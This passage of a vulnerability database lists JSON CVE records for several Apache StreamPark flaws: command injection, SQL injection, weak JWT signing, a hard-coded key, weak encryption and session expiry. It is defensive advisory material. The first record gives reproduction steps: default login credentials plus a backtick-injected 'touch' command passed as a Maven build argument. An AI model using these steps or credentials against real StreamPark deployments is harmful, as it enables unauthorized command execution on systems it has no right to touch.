"value": "In streampark, the project module integrates Maven\u0027s compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\u003cbr\u003e\u003cdiv\u003e\u003cbr\u003e\u003cdiv\u003eMitigation:\u003cbr\u003e\u003cbr\u003e\u003c/div\u003eall users \u003cspan style=\"background-color: var(--wht);\"\u003eshould upgrade to 2.1.4\u003cbr\u003e\u003cbr\u003eBackground info:\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e\u003cbr\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003e\u003cbr\u003eLog in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input `touch /tmp/success_2.1.2` as the \"Build Argument\". Note that there is no verification and interception of the special character \"`\". As a result, you will find that this injection command will be successfully executed after executing the build.\u003cbr\u003e\u003c/span\u003e\u003c/span\u003e\u003cbr\u003e\u003cdiv\u003eIn the latest version, the special symbol ` is intercepted.\u003c/div\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cdiv\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e\u003c/div\u003e\u003c/span\u003e\u003cdiv\u003e\u003cbr\u003e\u003cbr\u003e\u003c/div\u003e\u003c/div\u003e\u003cp\u003e\u003c/p\u003e\u003cbr\u003e"
}
],
"value": "In streampark, the project module integrates Maven\u0027s compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low.\n\nMitigation:\n\nall users should upgrade to 2.1.4\n\nBackground info:\n\nLog in to Streampark using the default username (e.g. test1, test2, test3) and the default password (streampark). Navigate to the Project module, then add a new project. Enter the git repository address of the project and input `touch /tmp/success_2.1.2` as the \"Build Argument\". Note that there is no verification and interception of the special character \"`\". As a result, you will find that this injection command will be successfully executed after executing the build.\n\nIn the latest version, the special symbol ` is intercepted."
}
],
"metrics": [
{
"other": {
"content": {
"text": "low"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-77",
"description": "CWE-77 Improper Neutralization of Special Elements used in a Command (\u0027Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-07-17T08:25:06.602Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/xhx7jt1t24s6d7o435wxng8t0ojfbfh5"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/07/17/2"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark (incubating): maven build params could trigger remote command execution",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2024-29737",
"datePublished": "2024-07-17T08:21:12.035Z",
"dateReserved": "2024-03-19T14:26:23.388Z",
"dateUpdated": "2025-02-13T17:47:42.503Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-53960 (GCVE-0-2025-53960)
Vulnerability from nvd – Published: 2025-12-12 15:15 – Updated: 2025-12-16 10:08
VLAI?
Title
Apache StreamPark: Uses the user’s password as the secret key
Summary
When issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user's password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user's password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover.
This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.
Users are recommended to upgrade to version 2.1.7, which fixes the issue.
Severity ?
No CVSS data available.
CWE
- CWE-1240 - Use of a Cryptographic Primitive with a Risky Implementation
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
2.0.0 , < 2.1.7
(semver)
|
Credits
omkar parkhe <omkarparth@gmail.com>
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-12-12T16:05:44.468Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/12/04/1"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-53960",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-12T18:47:19.959060Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-12T18:47:22.376Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.7",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "omkar parkhe \u003comkarparth@gmail.com\u003e"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003e\u003c/p\u003e\u003cdiv\u003e\u003cdiv\u003e\u003cp\u003eWhen issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user\u0027s password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user\u0027s password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover.\u003cbr\u003e\u003cbr\u003e\u003c/p\u003e\u003c/div\u003e\u003c/div\u003eThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\u003cp\u003e\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 2.1.7, which fixes the issue.\u003c/p\u003e"
}
],
"value": "When issuing JSON Web Tokens (JWT), Apache StreamPark directly uses the user\u0027s password as the HMAC signing key (e.g., with the HS256 algorithm). An attacker can exploit this vulnerability to perform offline brute-force attacks on the user\u0027s password using a captured JWT, or to arbitrarily forge identity tokens for the user if the password is already known, ultimately leading to complete account takeover.\n\n\n\n\n\n\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-1240",
"description": "CWE-1240 Use of a Cryptographic Primitive with a Risky Implementation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-16T10:08:36.613Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/xlpvfzf5l5m5mfyjwrz5h4dssm3c32vy"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: Uses the user\u2019s password as the secret key",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-53960",
"datePublished": "2025-12-12T15:15:49.443Z",
"dateReserved": "2025-07-15T15:10:34.714Z",
"dateUpdated": "2025-12-16T10:08:36.613Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-54947 (GCVE-0-2025-54947)
Vulnerability from nvd – Published: 2025-12-12 15:11 – Updated: 2025-12-12 18:48
VLAI?
Title
Apache StreamPark: Use hard-coded key vulnerability
Summary
In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access.
This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.
Users are recommended to upgrade to version 2.1.7, which fixes the issue.
Severity ?
No CVSS data available.
CWE
- CWE-321 - Use of Hard-coded Cryptographic Key
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
2.0.0 , < 2.1.7
(semver)
|
Credits
omkarparth@gmail.com
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-12-12T18:04:57.034Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/12/12/3"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-54947",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-12T18:48:43.558729Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-12T18:48:51.364Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.7",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "omkarparth@gmail.com"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eIn Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access.\u003c/p\u003e\u003cp\u003eThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 2.1.7, which fixes the issue.\u003c/p\u003e"
}
],
"value": "In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key exists. This vulnerability occurs because the system uses a fixed, immutable key for encryption instead of dynamically generating or securely configuring the key. Attackers may obtain this key through reverse engineering or code analysis, potentially decrypting sensitive data or forging encrypted information, leading to information disclosure or unauthorized system access.\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-321",
"description": "CWE-321 Use of Hard-coded Cryptographic Key",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-12T15:11:38.279Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/kdntmzyzrco75x9q6mc6s8lty1fxmog1"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: Use hard-coded key vulnerability",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-54947",
"datePublished": "2025-12-12T15:11:38.279Z",
"dateReserved": "2025-08-01T09:20:24.478Z",
"dateUpdated": "2025-12-12T18:48:51.364Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-54981 (GCVE-0-2025-54981)
Vulnerability from nvd – Published: 2025-12-12 15:10 – Updated: 2025-12-12 19:27
VLAI?
Title
Apache StreamPark: Weak Encryption Algorithm in StreamPark
Summary
Weak Encryption Algorithm in StreamPark, The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data
This issue affects Apache StreamPark: from 2.0.0 before 2.1.7.
Users are recommended to upgrade to version 2.1.7, which fixes the issue.
Severity ?
No CVSS data available.
CWE
- CWE-327 - Use of a Broken or Risky Cryptographic Algorithm
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
2.0.0 , < 2.1.7
(semver)
|
Credits
omkar parkhe <omkarparth@gmail.com>
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2025-12-12T18:04:58.530Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/12/12/4"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-54981",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-12T19:26:21.927771Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-12T19:27:16.118Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.7",
"status": "affected",
"version": "2.0.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "omkar parkhe \u003comkarparth@gmail.com\u003e"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003e\u003cspan style=\"background-color: rgb(255, 255, 255);\"\u003eWeak Encryption Algorithm in StreamPark,\u0026nbsp;The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data\u003cbr\u003e\u003c/span\u003e\u003cbr\u003eThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 2.1.7, which fixes the issue.\u003c/p\u003e"
}
],
"value": "Weak Encryption Algorithm in StreamPark,\u00a0The use of an AES cipher in ECB mode and a weak random number generator for encrypting sensitive data, including JWT tokens, may have risked exposing sensitive authentication data\n\nThis issue affects Apache StreamPark: from 2.0.0 before 2.1.7.\n\nUsers are recommended to upgrade to version 2.1.7, which fixes the issue."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-327",
"description": "CWE-327 Use of a Broken or Risky Cryptographic Algorithm",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-12T15:10:35.562Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/9rbvdvwg5fdhzjdgyrholgso53r26998"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: Weak Encryption Algorithm in StreamPark",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-54981",
"datePublished": "2025-12-12T15:10:35.562Z",
"dateReserved": "2025-08-04T10:13:02.810Z",
"dateUpdated": "2025-12-12T19:27:16.118Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-30001 (GCVE-0-2025-30001)
Vulnerability from nvd – Published: 2025-10-10 09:52 – Updated: 2025-11-04 21:09
VLAI?
Title
Apache StreamPark: Authenticated users can trigger remote command execution
Summary
Incorrect Execution-Assigned Permissions vulnerability in Apache StreamPark.
This issue affects Apache StreamPark: from 2.1.4 before 2.1.6.
Users are recommended to upgrade to version 2.1.6, which fixes the issue.
Severity ?
No CVSS data available.
CWE
- CWE-279 - Incorrect Execution-Assigned Permissions
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
2.1.4 , < 2.1.6
(semver)
|
Credits
Liufeng Yi (ylf@yiliufeng.net)
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-30001",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-10T18:58:38.235909Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-10-10T18:58:42.825Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T21:09:55.311Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/09/04/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.6",
"status": "affected",
"version": "2.1.4",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Liufeng Yi (ylf@yiliufeng.net)"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eIncorrect Execution-Assigned Permissions vulnerability in Apache StreamPark.\u003c/p\u003e\u003cp\u003eThis issue affects Apache StreamPark: from 2.1.4 before 2.1.6.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 2.1.6, which fixes the issue.\u003c/p\u003e"
}
],
"value": "Incorrect Execution-Assigned Permissions vulnerability in Apache StreamPark.\n\nThis issue affects Apache StreamPark: from 2.1.4 before 2.1.6.\n\nUsers are recommended to upgrade to version 2.1.6, which fixes the issue."
}
],
"metrics": [
{
"other": {
"content": {
"text": "low"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-279",
"description": "CWE-279 Incorrect Execution-Assigned Permissions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-10T09:52:26.810Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/xfmsvhkcnr1831n0w5ovy3p44lsmfb7m"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: Authenticated users can trigger remote command execution",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-30001",
"datePublished": "2025-10-10T09:52:26.810Z",
"dateReserved": "2025-03-13T15:21:07.661Z",
"dateUpdated": "2025-11-04T21:09:55.311Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-48988 (GCVE-0-2024-48988)
Vulnerability from nvd – Published: 2025-08-22 18:24 – Updated: 2025-11-04 21:09
VLAI?
Title
Apache StreamPark: SQL injection vulnerability
Summary
SQL Injection vulnerability in Apache StreamPark.
This issue affects Apache StreamPark: from 2.1.4 before 2.1.6.
Users are recommended to upgrade to version 2.1.6, which fixes the issue.
This vulnerability is present only in the distribution package (SpringBoot platform) and does not involve Maven artifacts.
It can only be exploited after a user has successfully logged into the platform (implying that the attacker would first need to compromise the login authentication).
As a result, the associated risk is considered relatively low.
Severity ?
No CVSS data available.
CWE
- CWE-564 - SQL Injection
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
2.1.4 , < 2.1.6
(semver)
|
Credits
Xingchen Chen, Ze Jin, wh1t3p1g, yhbl, Qixu Liu Institute of Information Engineering, CAS
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-48988",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-08-22T18:46:36.076690Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-08-22T18:47:04.200Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T21:09:00.563Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"url": "http://www.openwall.com/lists/oss-security/2025/08/22/1"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.6",
"status": "affected",
"version": "2.1.4",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "Xingchen Chen, Ze Jin, wh1t3p1g, yhbl, Qixu Liu Institute of Information Engineering, CAS"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eSQL Injection vulnerability in Apache StreamPark.\u003c/p\u003e\u003cp\u003eThis issue affects Apache StreamPark: from 2.1.4 before 2.1.6.\u003c/p\u003e\u003cp\u003eUsers are recommended to upgrade to version 2.1.6, which fixes the issue.\u003c/p\u003e\u003cbr\u003eThis vulnerability is present only in the distribution package (SpringBoot platform) and does not involve Maven artifacts.\u003cbr\u003eIt can only be exploited after a user has successfully logged into the platform (implying that the attacker would first need to compromise the login authentication). \u003cbr\u003eAs a result, the associated risk is considered relatively low.\u003cbr\u003e\u003cp\u003e\u003cbr\u003e\u003c/p\u003e"
}
],
"value": "SQL Injection vulnerability in Apache StreamPark.\n\nThis issue affects Apache StreamPark: from 2.1.4 before 2.1.6.\n\nUsers are recommended to upgrade to version 2.1.6, which fixes the issue.\n\n\nThis vulnerability is present only in the distribution package (SpringBoot platform) and does not involve Maven artifacts.\nIt can only be exploited after a user has successfully logged into the platform (implying that the attacker would first need to compromise the login authentication). \nAs a result, the associated risk is considered relatively low."
}
],
"metrics": [
{
"other": {
"content": {
"text": "low"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-564",
"description": "CWE-564 SQL Injection",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-08-22T18:24:22.144Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/26ng8388l93zwjrst560cbjz9x7wpq1s"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache StreamPark: SQL injection vulnerability",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2024-48988",
"datePublished": "2025-08-22T18:24:22.144Z",
"dateReserved": "2024-10-11T12:07:26.343Z",
"dateUpdated": "2025-11-04T21:09:00.563Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-29070 (GCVE-0-2024-29070)
Vulnerability from nvd – Published: 2024-07-23 08:13 – Updated: 2024-09-13 17:04
VLAI?
Title
Apache StreamPark: session not invalidated after logout
Summary
On versions before 2.1.4, session is not invalidated after logout. When the user logged in successfully, the Backend service returns "Authorization" as the front-end authentication credential. "Authorization" can still initiate requests and access data even after logout.
Mitigation:
all users should upgrade to 2.1.4
Severity ?
No CVSS data available.
CWE
- CWE-613 - Insufficient Session Expiration
Assigner
References
| URL | Tags | ||||
|---|---|---|---|---|---|
|
|||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Apache Software Foundation | Apache StreamPark |
Affected:
1.0.0 , < 2.1.4
(semver)
|
Credits
L0ne1y
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:a:apache_software_foundation:apache_streampark:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unaffected",
"product": "apache_streampark",
"vendor": "apache_software_foundation",
"versions": [
{
"lessThan": "2.1.4",
"status": "affected",
"version": "1.0.0",
"versionType": "semver"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-29070",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-07-23T14:42:15.338950Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-07-23T14:47:17.230Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-09-13T17:04:30.274Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/zslblrz1l0n9t67mqdv42yv75ncfn9zl"
},
{
"url": "http://www.openwall.com/lists/oss-security/2024/07/22/4"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache StreamPark",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "2.1.4",
